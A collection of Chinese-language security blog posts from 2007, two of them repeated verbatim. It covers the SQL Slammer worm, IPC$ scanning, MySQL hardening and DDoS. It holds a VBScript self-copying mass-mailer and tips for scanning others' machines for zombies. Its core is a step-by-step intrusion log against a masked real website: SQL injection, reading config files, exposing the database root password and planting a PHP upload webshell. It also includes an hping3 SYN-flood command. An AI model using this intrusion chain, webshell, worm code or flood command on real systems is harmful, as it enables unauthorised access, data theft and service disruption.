蠕蟲和普通病毒不同的一個特征是蠕蟲病毒往往能夠利用漏洞,這里的漏洞或者說是缺陷,我們分為2種,軟件上的缺陷和人為上的缺陷。軟件上的缺陷,如遠程溢出,微軟ie和outlook的自動執行漏洞等等,需要軟件廠商和用戶共同配合,不斷的升級軟件。而人為的缺陷,主要是指的是計算機用戶的疏忽。這就是所謂的社會工程學(social engineering),當收到一封郵件帶著病毒的求職信郵件時候,大多數人都會報著好奇去點擊的。對于企業用戶來說,威脅主要集中在服務器和大型應用軟件的安全上,而個人用戶而言,主要是防范第二種缺陷。
1.利用系統漏洞的惡性蠕蟲病毒分析
在這種病毒中,以紅色代碼,尼姆達和sql蠕蟲為代表!他們共同的特征是利用微軟服務器和應用程序組件的某個漏洞進行攻擊,由于網上存在這樣的漏洞比較普遍,使得病毒很容易的傳播!而且攻擊的對象大都為服務器,所以造成的網絡堵塞現象嚴重!
以2003年1月26號爆發的sql蠕蟲為例,爆發數小時內席卷了全球網絡,造成網絡大塞車.亞洲國家中以人口上網普及率達七成的韓國所受影響較為嚴重。韓國兩大網絡業KFT及***電訊公司,系統都陷入了癱瘓,其它的網絡用戶也被迫斷線,更為嚴重的是許多銀行的自動取款機都無法正常工作, 美國許美國銀行統計,該行的13000臺自動柜員機已經無法提供正常提款。網絡蠕蟲病毒開始對人們的生活產生了巨大的影響!
這次sql蠕蟲攻擊的是微軟數據庫系Microsoft SQL Server 2000的,利用了MSSQL2000服務遠程堆棧緩沖區溢出漏洞, Microsoft SQL Server 2000是一款由Microsoft公司開發的商業性質大型數據庫系統。SQL Server監聽UDP的1434端口,客戶端可以通過發送消息到這個端口來查詢目前可用的連接方式(連接方式可以是命名管道也可以是TCP),但是此程序存在嚴重漏洞,當客戶端發送超長數據包時,將導致緩沖區溢出,黑客可以利用該漏洞在遠程機器上執行自己的惡意代碼。
微軟在200年7月份的時候就為這個漏洞發布了一個安全公告,但當sql蠕蟲爆發的時候,依然有大量的裝有ms sqlserver 2000的服務器沒有安裝最新的補丁,從而被蠕蟲病毒所利用,蠕蟲病毒通過一段376個字節的惡意代碼,遠程獲得對方主機的系統控制權限, 取得三個Win32 API地址,GetTickCount、socket、sendto,接著病毒使用GetTickCount獲得一個隨機數,進入一個死循環繼續傳播。在該循環中蠕蟲使用獲得的隨機數生成一個隨機的ip地址,然后將自身代碼發送至1434端口(Microsoft SQL Server開放端口),該蠕蟲傳播速度極快,其使用廣播數據包方式發送自身代碼,每次均攻擊子網中所有255臺可能存在機器。由于這是一個死循環的過程,發包密度僅和機器性能和網絡帶寬有關,所以發送的數據量非常大。該蠕蟲對被感染機器本身并沒有進行任何惡意破壞行為,也沒有向硬盤上寫文件,僅僅存在與內存中。對于感染的系統,重新啟動后就可以清除蠕蟲,但是仍然會重復感染。由于發送數據包占用了大量系統資源和網絡帶寬,形成Udp Flood,感染了該蠕蟲的網絡性能會極度下降。一個百兆網絡內只要有一兩臺機器感染該蠕蟲就會導致整個網絡訪問阻塞。
通過以上分析可以知道,此蠕蟲病毒本身除了對網絡產生拒絕服務攻擊外,并沒有別的破壞措施.但如果病毒編寫者在編寫病毒的時候加入破壞代碼,后果將不堪設想!
2.企業防范蠕蟲病毒措施
此次sql蠕蟲病毒,利用的漏洞在2002年7月份微軟的一份安全公告中就有詳細說明!而且微軟也提供了安全補丁提供下載,然而在時隔半年之后互聯網上還有相當大的一部分服務器沒有安裝最新的補丁,其網絡管理員的安全防范意識可見一斑!
當前,企業網絡主要應用于文件和打印服務共享、辦公自動化系統、企業業務(MIS)系統、Internet應用等領域。網絡具有便利信息交換特性,蠕蟲病毒也可以充分利用網絡快速傳播達到其阻塞網絡目的。企業在充分地利用網絡進行業務處理時,就不得不考慮企業的病毒防范問題,以保證關系企業命運的業務數據完整不被破壞。
企業防治蠕蟲病毒的時候需要考慮幾個問題:病毒的查殺能力,病毒的監控能力,新病毒的反應能力。而企業防毒的一個重要方面是是管理和策略。推薦的企業防范蠕蟲病毒的策略如下:
(1)加強網絡管理員安全管理水平,提高安全意識。由于蠕蟲病毒利用的是系統漏洞進行攻擊,所以需要在第一時間內保持系統和應用軟件的安全性,保持各種操作系統和應用軟件的更新!由于各種漏洞的出現,使得安全不在是一種一勞永逸的事,而作為企業用戶而言,所經受攻擊的危險也是越來越大,要求企業的管理水平和安全意識也越來越高!
(2)建立病毒檢測系統。能夠在第一時間內檢測到網絡異常和病毒攻擊。
(3)建立應急響應系統,將風險減少到最小!由于蠕蟲病毒爆發的突然性,可能在病毒發現的時候已經蔓延到了整個網絡,所以在突發情況下,建立一個緊急響應系統是很有必要的,在病毒爆發的第一時間即能提供解決方案。
(4)建立災難備份系統。對于數據庫和數據系統,必須采用定期備份,多機備份措施,防止意外災難下的數據丟失!
(5)對于局域網而言,可以采用以下一些主要手段:A.在因特網接入口處安裝防火墻式防殺計算機病毒產品,將病毒隔離在局域網之外。B.對郵件服務器進行監控,防止帶毒郵件進行傳播!C.對局域網用戶進行安全培訓。D.建立局域網內部的升級系統,包括各種操作系統的補丁升級,各種常用的應用軟件升級,各種殺毒軟件病毒庫的升級等等!3.對個人用戶產生直接威脅的蠕蟲病毒
在以上分析的蠕蟲病毒中,只對安裝了特定的微軟組件的系統進行攻擊,而對廣大個人用戶而言,是不會安裝iis(微軟的因特網服務器程序,可以使允許在網上提供web服務)或者是龐大的數據庫系統的!因此上述病毒并不會直接攻擊個個人用戶的電腦(當然能夠間接的通過網絡產生影響),但接下來分析的蠕蟲病毒,則是對個人用戶威脅最大,同時也是最難以根除,造成的損失也更大的一類蠕蟲病毒!
對于個人用戶而言,威脅大的蠕蟲病毒采取的傳播方式一般為電子郵件(Email)以及惡意網頁等等!
對于利用email傳播得蠕蟲病毒來說,通常利用的是社會工程學(Social Engineering),即以各種各樣的欺騙手段那誘惑用戶點擊的方式進行傳播!
惡意網頁確切的講是一段黑客破壞代碼程序,它內嵌在網頁中,當用戶在不知情的情況下打開含有病毒的網頁時,病毒就會發作。這種病毒代碼鑲嵌技術的原理并不復雜,所以會被很多懷不良企圖者利用,在很多黑客網站竟然出現了關于用網頁進行破壞的技術的論壇,并提供破壞程序代碼下載,從而造成了惡意網頁的大面積泛濫,也使越來越多的用戶遭受損失。
對于惡意網頁,常常采取vb script和java script編程的形式!由于編程方式十分的簡單!所以在網上非常的流行!
Vb script和java script是由微軟操作系統的wsh(Windows Scripting HostWindows腳本主機)解析并執行的,由于其編程非常簡單,所以此類腳本病毒在網上瘋狂傳播,瘋狂一時的愛蟲病毒就是一種vbs腳本病毒,然后偽裝成郵件附件誘惑用戶點擊運行,更為可怕的是,這樣的病毒是以源代碼的形式出現的,只要懂得一點關于腳本編程的人就可以修改其代碼,形成各種各樣的變種。
下面以一個簡單的腳本為例:
Set objFs=CreateObject (“Scripting.FileSystemObject”)
(創建一個文件系統對象)objFs.CreateTextFile ("C:\virus.txt", 1)
(通過文件系統對象的方法創建了TXT文件)
如果我們把這兩句話保存成為.vbs的VB腳本文件,點擊就會在C盤中創建一個TXT文件了。倘若我們把第二句改為:
objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")
就可以將自身復制到C盤virus.vbs這個文件。本句前面是打開這個腳本文件,WScript.ScriptFullName指明是這個程序本身,是一個完整的路徑文件名。GetFile函數獲得這個文件,Copy函數將這個文件復制到C盤根目錄下virus.vbs這個文件。這么簡單的兩句就實現了自我復制的功能,已經具備病毒的基本特征——自我復制能力。
此類病毒往往是通過郵件傳播的,在vb script中調用郵件發送功能也非常的簡單,病毒往往采用的方法是向outlook中的地址薄中的郵件地址發送帶有包含自身的郵件來達到傳播目的,一個簡單的實例如下:
Set objOA=Wscript.CreateObject ("Outlook.Application")
(創建一個OUTLOOK應用的對象)Set objMapi=objOA.GetNameSpace ("MAPI")
(取得MAPI名字空間)For i=1 to objMapi.AddressLists.Count(遍歷地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count Set
objMail=objOA.CreateItem (0) objMail.Recipients.Add
(objAddList. AddressEntries
(j))
(取得收件人郵件地址 )objMail.Subject="你好!"
(設置郵件主題,這個往往具有很大的誘惑性質)
objMail.Body="這次給你的附件,是我的新文檔!"
(設置信件內容)objMail.Attachments.Add (“c:\virus.vbs")
(把自己作為附件擴散出去 )objMail.Send(發送郵件)
NextNext Set objMapi=Nothing(清空objMapi變量,釋放資源)
set objOA=Nothing(清空objOA變量)
這一小段代碼的功能是向地址簿中的用戶發送電子郵件,并將自己作為附件擴散出去。這段代碼中的第一行是創建一個Outlook的對象,是必不可少的。在其下是一個循環,在循環中不斷地向地址簿中的電子郵件地址發送內容相同的信件。這就是蠕蟲的傳播性。
由此可以看出,利用vb script編寫病毒是非常容易的,這就使得此類病毒的變種繁多,破壞力極大,同時也是非常難以根除的!
4.個人用戶對蠕蟲病毒的防范措施
通過上述的分析,我們可以知道,病毒并不是非常可怕的,網絡蠕蟲病毒對個人用戶的攻擊主要還是通過社會工程學,而不是利用系統漏洞!所以防范此類病毒需要注意以下幾點:
(1)購合適的殺毒軟件!網絡蠕蟲病毒的發展已經使傳統的殺毒軟件的“文件級實時監控系統”落伍,殺毒軟件必須向內存實時監控和郵件實時監控發展!另外面對防不勝防的網頁病毒,也使得用戶對殺毒軟件的要求越來越高!在殺毒軟件市場上,賽門鐵克公司的norton系列殺毒軟件在全球具有很大的比例!經過多項測試,norton殺毒系列軟件腳本和蠕蟲阻攔技術能夠阻擋大部分電子郵件病毒,而且對網頁病毒也有相當強的防范能力!目前國內的殺毒軟件也具有了相當高的水平。像瑞星,kv系列等殺毒軟件,在殺毒軟件的同時整合了防火強功能,從而對蠕蟲兼木馬程序有很大克制作用。
(2)經常升級病毒庫,殺毒軟件對病毒的查殺是以病毒的特征碼為依據的,而病毒每天都層出不窮,尤其是在網絡時代,蠕蟲病毒的傳播速度快,變種多,所以必須隨時更新病毒庫,以便能夠查殺最新的病毒!
(3)提高防殺毒意識.不要輕易去點擊陌生的站點,有可能里面就含有惡意代碼!
當運行IE時,點擊“工具→Internet選項→安全→ Internet區域的安全級別”,把安全級別由“中”改為“高” 。因為這一類網頁主要是含有惡意代碼的ActiveX或Applet、 JavaScript的網頁文件 ,所以在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以大大減少被網頁惡意代碼感染的幾率。具體方案是:在IE窗口中點擊“工具”→“Internet選項”,在彈出的對話框中選擇“安全”標簽,再點擊“自定義級別”按鈕,就會彈出“安全設置”對話框,把其中所有ActiveX插件和控件以及與Java相關全部選項選擇“禁用”。但是,這樣做在以后的網頁瀏覽過程中有可能會使一些正常應用ActiveX的網站無法瀏覽。
(4)不隨意查看陌生郵件,尤其是帶有附件的郵件,由于有的病毒郵件能夠利用ie和outlook的漏洞自動執行,所以計算機用戶需要升級ie和outlook程序,及常用的其他應用程序!
三、小結
網絡蠕蟲病毒作為一種互聯網高速發展下的一種新型病毒,必將對網絡產生巨大的危險。在防御上,已經不再是由單獨的殺毒廠商所能夠解決,而需要網絡安全公司,系統廠商,防病毒廠商及用戶共同參與,構筑全方位的防范體系!
蠕蟲和黑客技術的結合,使得對蠕蟲的分析,檢測和防范具有一定的難度,同時對蠕蟲的網絡傳播性,網絡流量特性建立數學模型也是有待研究的工作!
IPC$ 掃描和IPC$漏洞的防范
[ 2007-03-25 03:58:11 | 作者: sun ]
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道并以此通道進行加密數據的交換,從而實現對遠程計算機的訪問。IPC$是NT/2000的一項新功能,它有一個特點,即在同一時間內,兩個IP之間只允許建立一個連接。簡單點說就是通過你的系統帳號和密碼登陸你的系統的一個通道!而 IPC$ 并不算是一個漏洞,但因一般電腦用戶設置系統的密碼為空,這就成為一個可給利用的漏洞了!別人用管理員權限的帳號和空密碼登陸你的系統后,別人就可以開共享,執行命令、程序、木馬,還可以刪除你的系統文件,危險性極大!
怎樣防范
--------------------------------------------------------------------
請把你系統帳號設置為非空的密碼,而密碼不能太簡單!這樣,別人就掃描不出你的密碼!當然要你記得住,如果自己都記不住那就。。。。
請加一個防火墻,把IPC相關的端口禁止外網訪問!
端口如下:
要禁止TCP的端口,135,139,445
要禁止UDP的端口 137 (這是讀取你機子名字的端口,MAC掃描就是掃描這個端口的)
這樣,別人利用IPC$(也就是常說的肉雞掃描)就掃不到你機子了!
如果禁止所以人連接你的 135 137 139 445 端口后,如果你是在一個局域網里,那共享功能也無效了!可以設置防火墻允許局域網用戶通過,就可以解決共享問題!
如果你是一臺機上網的,根本不用共享的功能,你可以關掉如下服務:
Computer Browser
Server
Workstation
這樣,IPC就不建立了,IPC入侵就不能成功,但防火墻還是要開,因為有些工具還是可以通過
135端口的WMI服務,進行入侵!
啊D工具掃描,使用注意!
-------------------------------------------------------------------------------------------------------
當你使用啊D工具包進行掃描時,你也不想成為肉雞,請把你的帳號密碼不要設置為空,
并帳號的密碼不能太過簡單,并使用防火墻禁止 135,139,445端口!
UDP的137 端口必須開放,如果不開發,掃不到肉雞!
也請把下面的服務開啟!
Computer Browser
Server
Workstation
如上設置,你可以掃到別人,別人掃描不到你!這樣就可以進行漏洞檢測了!
怎樣防范
--------------------------------------------------------------------
請把你系統帳號設置為非空的密碼,而密碼不能太簡單!這樣,別人就掃描不出你的密碼!當然要你記得住,如果自己都記不住那就。。。。
請加一個防火墻,把IPC相關的端口禁止外網訪問!
端口如下:
要禁止TCP的端口,135,139,445
要禁止UDP的端口 137 (這是讀取你機子名字的端口,MAC掃描就是掃描這個端口的)
這樣,別人利用IPC$(也就是常說的肉雞掃描)就掃不到你機子了!
如果禁止所以人連接你的 135 137 139 445 端口后,如果你是在一個局域網里,那共享功能也無效了!可以設置防火墻允許局域網用戶通過,就可以解決共享問題!
如果你是一臺機上網的,根本不用共享的功能,你可以關掉如下服務:
Computer Browser
Server
Workstation
這樣,IPC就不建立了,IPC入侵就不能成功,但防火墻還是要開,因為有些工具還是可以通過
135端口的WMI服務,進行入侵!
啊D工具掃描,使用注意!
-------------------------------------------------------------------------------------------------------
當你使用啊D工具包進行掃描時,你也不想成為肉雞,請把你的帳號密碼不要設置為空,
并帳號的密碼不能太過簡單,并使用防火墻禁止 135,139,445端口!
UDP的137 端口必須開放,如果不開發,掃不到肉雞!
也請把下面的服務開啟!
Computer Browser
Server
Workstation
如上設置,你可以掃到別人,別人掃描不到你!這樣就可以進行漏洞檢測了!
記一次安全檢測的全部過程
[ 2007-03-25 03:57:56 | 作者: sun ]
copy from 至尊寶's Blog
>>>>>>記一次安全檢測<<<<<<
測試站點如下
http://www.******.com
找個踩點
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830
提交一個 '
返回結果
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154
路徑出來了,繼續安檢.
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830'and 1=1 #
返回錯誤,不是字符型.
注明:%23是#
提交 and 1=1 返回正常
提交 and 1=2 返回不正常
接下來就是 union 語句
and 1=1 union select 1 返回不正常
and 1=1 union select 1,2 返回不正常
and 1=1 union select 1,2,3 返回不正常
and 1=1 union select 1,2,3,4 返回不正常
and 1=1 union select 1,2,3,4,5 返回不正常
and 1=1 union select 1,2,3,4,5,6 返回不正常
and 1=1 union select 1,2,3,4,5,6,7 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 返回正常
猜到 14 就正常了 繼續下一步.
一般這樣的站點基本上后臺是不可能那么容易讓我們找到的..
還是先看看有沒有再說吧..
猜猜常用的路徑.
login.php
admin.php
admin_login.php
admin_index.php
admin/login.php
admin/admin.php
admin/admin_login.php
admin/admin_index.php
manage/index.php
manage/login.php
manage/admin_login.php
manage/admin_index.php
等等.有耐心的可以慢慢去猜.就算猜到了也沒什么用.
我們還是用比較直接的方法吧.直接用 load_file 讀取文件內容
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
里面的 and 1=1 變成 and 1=2
返回結果如下:
2
就在2的位置暴了我們需要的文件內容.
我們就從 /var/www/html/zhaobiao/zhaobiao_hy_show.php
直接用 load_file('/var/www/html/zhaobiao/zhaobiao_hy_show.php')
前提是要把 /var/www/html/zhaobiao/zhaobiao_hy_show.php 轉換成 16 進制
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file
(0x2F7661722F7777772F68746D6C2F7A68616F6269616F2F7A68616F6269616F5F68795F73686F772E706870),3,4,5,6,7,8,9,10,11,12,13,14
返回結果
0 or $regdate>mysql_result($query,0,'yxdate')){?>
",mysql_result($query,0,'sm'));?>
不要管這些,直接查看源文件找到了一個 inc.php 的文件 然后配合前面的路徑
/var/www/html/inc.php
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file
(0x2F7661722F7777772F68746D6C2F696E632E706870),3,4,5,6,7,8,9,10,11,12,13,14
暴一下 返回看不到內容 直接查看源文件
<?
$myconn=mysql_connect('localhost','root','www.******.comy0p5h1i0');
mysql_select_db('mlk');
?>
Mysql 直接暴出來了..
下一步就是登陸 Mysql 然后插入自己準備好的小馬..
use mlk;
create table mmxy (cmd TEXT);
insert into mmxy values('<?php');
insert into mmxy values('$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "Successful" : "failure";');
insert into mmxy values('echo $msg;');
insert into mmxy values('?>');
insert into mmxy values('<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">');
insert into mmxy values('<input NAME="MyFile" TYPE="file">');
insert into mmxy values('<input VALUE="Up" TYPE="submit"></form>');
select * from mmxy into outfile '/var/www/html/zhaobiao/mmxy.php';
>>>>>>記一次安全檢測<<<<<<
測試站點如下
http://www.******.com
找個踩點
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830
提交一個 '
返回結果
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154
路徑出來了,繼續安檢.
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830'and 1=1 #
返回錯誤,不是字符型.
注明:%23是#
提交 and 1=1 返回正常
提交 and 1=2 返回不正常
接下來就是 union 語句
and 1=1 union select 1 返回不正常
and 1=1 union select 1,2 返回不正常
and 1=1 union select 1,2,3 返回不正常
and 1=1 union select 1,2,3,4 返回不正常
and 1=1 union select 1,2,3,4,5 返回不正常
and 1=1 union select 1,2,3,4,5,6 返回不正常
and 1=1 union select 1,2,3,4,5,6,7 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 返回正常
猜到 14 就正常了 繼續下一步.
一般這樣的站點基本上后臺是不可能那么容易讓我們找到的..
還是先看看有沒有再說吧..
猜猜常用的路徑.
login.php
admin.php
admin_login.php
admin_index.php
admin/login.php
admin/admin.php
admin/admin_login.php
admin/admin_index.php
manage/index.php
manage/login.php
manage/admin_login.php
manage/admin_index.php
等等.有耐心的可以慢慢去猜.就算猜到了也沒什么用.
我們還是用比較直接的方法吧.直接用 load_file 讀取文件內容
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
里面的 and 1=1 變成 and 1=2
返回結果如下:
2
就在2的位置暴了我們需要的文件內容.
我們就從 /var/www/html/zhaobiao/zhaobiao_hy_show.php
直接用 load_file('/var/www/html/zhaobiao/zhaobiao_hy_show.php')
前提是要把 /var/www/html/zhaobiao/zhaobiao_hy_show.php 轉換成 16 進制
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file
(0x2F7661722F7777772F68746D6C2F7A68616F6269616F2F7A68616F6269616F5F68795F73686F772E706870),3,4,5,6,7,8,9,10,11,12,13,14
返回結果
0 or $regdate>mysql_result($query,0,'yxdate')){?>
",mysql_result($query,0,'sm'));?>
不要管這些,直接查看源文件找到了一個 inc.php 的文件 然后配合前面的路徑
/var/www/html/inc.php
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file
(0x2F7661722F7777772F68746D6C2F696E632E706870),3,4,5,6,7,8,9,10,11,12,13,14
暴一下 返回看不到內容 直接查看源文件
<?
$myconn=mysql_connect('localhost','root','www.******.comy0p5h1i0');
mysql_select_db('mlk');
?>
Mysql 直接暴出來了..
下一步就是登陸 Mysql 然后插入自己準備好的小馬..
use mlk;
create table mmxy (cmd TEXT);
insert into mmxy values('<?php');
insert into mmxy values('$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "Successful" : "failure";');
insert into mmxy values('echo $msg;');
insert into mmxy values('?>');
insert into mmxy values('<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">');
insert into mmxy values('<input NAME="MyFile" TYPE="file">');
insert into mmxy values('<input VALUE="Up" TYPE="submit"></form>');
select * from mmxy into outfile '/var/www/html/zhaobiao/mmxy.php';
數據安全之MySQL安全的二十三條軍規
[ 2007-03-25 03:57:41 | 作者: sun ]
使用MySQL,安全問題不能不注意。以下是MySQL提示的23個注意事項:
1.如果客戶端和服務器端的連接需要跨越并通過不可信任的網絡,那么就需要使用SSH隧道來加密該連接的通信。
2.用set password語句來修改用戶的密碼,三個步驟,先“mysql -u root”登陸數據庫系統,然后“mysql> update mysql.user set password=password('newpwd')”,最后執行“flush privileges”就可以了。
3.需要提防的攻擊有,防偷聽、篡改、回放、拒絕服務等,不涉及可用性和容錯方面。對所有的連接、查詢、其他操作使用基于ACL即訪問控制列表的安全措施來完成。也有一些對SSL連接的支持。
4.除了root用戶外的其他任何用戶不允許訪問mysql主數據庫中的user表;
加密后存放在user表中的加密后的用戶密碼一旦泄露,其他人可以隨意用該用戶名/密碼相應的數據庫;
5.用grant和revoke語句來進行用戶訪問控制的工作;
6.不使用明文密碼,而是使用md5()和sha1()等單向的哈系函數來設置密碼;
7.不選用字典中的字來做密碼;
8.采用防火墻來去掉50%的外部危險,讓數據庫系統躲在防火墻后面工作,或放置在DMZ區域中;
9.從因特網上用nmap來掃描3306端口,也可用telnet server_host 3306的方法測試,不能允許從非信任網絡中訪問數據庫服務器的3306號TCP端口,因此需要在防火墻或路由器上做設定;
10.為了防止被惡意傳入非法參數,例如where ID=234,別人卻輸入where ID=234 or 1=1導致全部顯示,所以在web的表單中使用''或""來用字符串,在動態URL中加入%22代表雙引號、%23代表井號、%27代表單引號;傳遞未檢查過的值給mysql數據庫是非常危險的;
11.在傳遞數據給mysql時檢查一下大小;
12.應用程序需要連接到數據庫應該使用一般的用戶帳號,只開放少數必要的權限給該用戶;
13.在各編程接口(C C++ PHP Perl Java JDBC等)中使用特定‘逃脫字符’函數;
在因特網上使用mysql數據庫時一定少用傳輸明文的數據,而用SSL和SSH的加密方式數據來傳輸;
14.學會使用tcpdump和strings工具來查看傳輸數據的安全性,例如tcpdump -l -i eth0 -w -src or dst port 3306 | strings。以普通用戶來啟動mysql數據庫服務;
15.不使用到表的聯結符號,選用的參數 --skip-symbolic-links;
16.確信在mysql目錄中只有啟動數據庫服務的用戶才可以對文件有讀和寫的權限;
17.不許將process或super權限付給非管理用戶,該mysqladmin processlist可以列舉出當前執行的查詢文本;super權限可用于切斷客戶端連接、改變服務器運行參數狀態、控制拷貝復制數據庫的服務器;
18.file權限不付給管理員以外的用戶,防止出現load data '/etc/passwd'到表中再用select 顯示出來的問題;
19.如果不相信DNS服務公司的服務,可以在主機名稱允許表中只設置IP數字地址;
20.使用max_user_connections變量來使mysqld服務進程,對一個指定帳戶限定連接數;
21.grant語句也支持資源控制選項;
22.啟動mysqld服務進程的安全選項開關,--local-infile=0或1 若是0則客戶端程序就無法使用local load data了,賦權的一個例子grant insert(user) on mysql.user to 'user_name'@'host_name';若使用--skip-grant-tables系統將對任何用戶的訪問不做任何訪問控制,但可以用mysqladmin flush-privileges或mysqladmin reload來開啟訪問控制;默認情況是show databases語句對所有用戶開放,可以用--skip-show-databases來關閉掉。
23.碰到Error 1045(28000) Access Denied for user 'root'@'localhost' (Using password:NO)錯誤時,你需要重新設置密碼,具體方法是:先用--skip-grant-tables參數啟動mysqld,然后執行mysql -u root mysql,mysql>update user set password=password('newpassword') where user='root';mysql>Flush privileges;,最后重新啟動mysql就可以了。
DDoS防范和全局網絡安全的應對
[ 2007-03-25 03:57:30 | 作者: sun ]
技術
拒絕服務技術的創新已經基本塵埃落定,而上個世紀最后十年的發明也逐漸遙遠。然而,隨著寬帶接入、自動化和如今家庭計算機功能的日益強大,使得對拒絕服務攻擊的研究有些多余。尤其是當我們發現一些本已在90年代末銷聲匿跡的古老的攻擊方式,(例如land ,其使用類似的源和目標 IP 地址和端口發送 UDP 信息包)這些攻擊技術 現在又卷土重來時,這個結論就更加顯而易見。在這一方面唯一的進步就是可以發起并行任務,從而可以通過簡單的 486 處理器所無法實現的方式來顯著提高攻擊強度。
另一個要考慮的重點是事實上IP堆棧似乎并未正確地安裝補丁程序。計算機不再會因為單一的信息包而崩潰;但是,CPU操作會為了處理這種信息包而保持高速運行。因為補丁失效期間生成的信息包是有限的,所以要實現有效的攻擊并不容易。可能是技術提高得太快。不管是什么原因,這些陳舊過時的攻擊方式現在又卷土重來,而且還非常有效。
使用拒絕服務
拒絕服務攻擊開始可能只是為了“取樂”,對系統操作員進行某種報復或是實現各種復雜的攻擊,例如對遠程服務的隱形欺騙。某人因在某一信道上遭到侮辱后也經常會將IRC服務器作為攻擊目標。這種情況下的網絡和因特網使用是“保密的”,這些攻擊對其造成的影響微乎其微。
隨著時間的流逝,因特網逐漸成為一種通信渠道,hacktivism(網絡激進主義)越來越流行。地理政治形勢、戰爭、宗教問題、生態等任何動機都可能成為對公司、政治組織或甚至國家的IT基礎架構發動進攻的動機。
最近的拒絕服務攻擊更多的是與聯機游戲有關。某些玩家對在游戲中被人殺死或丟失他們喜愛的武器不滿意,因此發動拒絕服務攻擊,許多服務器已經成為這種攻擊的犧牲品。
但是如今使用拒絕服務的目的大多數是純粹的敲詐勒索。越來越多的企業開始依賴他們的IT基礎架構。郵件、關鍵數據、甚至電話都通過網絡來處理。如果沒有這些主要的通信渠道,大多數公司都難以在競爭中幸存。而且,因特網還是一種生產工具。例如,搜索引擎和博彩web 站點都完全依賴網絡連接。
因此,隨著公司直接或間接地依賴因特網,原有的敲詐信逐漸轉變成數字形式。首先在短暫而非緊要的時間段內發動攻擊。然后受害者就不得不支付“保護費”。
網絡協議攻擊
這些攻擊瞄準傳輸信道,并因此以IP堆棧作為攻擊目標,IP堆棧是內存和 CPU 之類關鍵資源的進入點。
SYN洪水
SYN洪水是典型的基于概念的拒絕服務攻擊,因為這種攻擊完全依賴于TCP連接的建立方式。在最初的 3 向握手期間,服務器填寫保存內存中會話信息的 TCB(傳輸控制塊)表。當服務器收到來自客戶機的初始 SYN 信息包時,向客戶機發送回一個 SYN-ACK 信息包并在 TCB 中創建一個入口。只要服務器在等待來自客戶機的最終 ACK 信息包,該連接便處于 TIME_WAIT 狀態。如果最終沒有收到 ACK 信息包,則將另一個 SYN-ACK 發送到客戶機。最后,如果經多次重試后,客戶機沒有認可任何 SYN-ACK 信息包,則關閉會話并從 TCB 中刷新會話。從傳輸第一個 SYN-ACK 到會話關閉這段時間通常大約為 30 秒。
在這段時間內,可能會將數十萬個SYN信息包發送到開放的端口且絕不會認可服務器的SYN-ACK 信息包。TCB 很快就會超過負荷,且堆棧無法再接受任何新的連接并將現有的連接斷開。因為攻擊者不用接收來自服務器的 SYN-ACK 信息包,所以他們可以偽造初始 SYN 信息包的源地址。這就使得跟蹤攻擊的真實來源更加困難。此外,因為 SYN-ACK 信息包沒有發送到攻擊者,所以這樣還為攻擊者節省了帶寬。
生成這種攻擊很容易,只要在命令行輸入一條命令就足夠了。
#hping3--rand-source–S –L 0 –p
存在的變體也很少,通常為了增加CPU的使用率會將某些異常添加到SYN 信息包。這些可能是序列號或源端口0等合法的異常。
SYN-ACK洪水
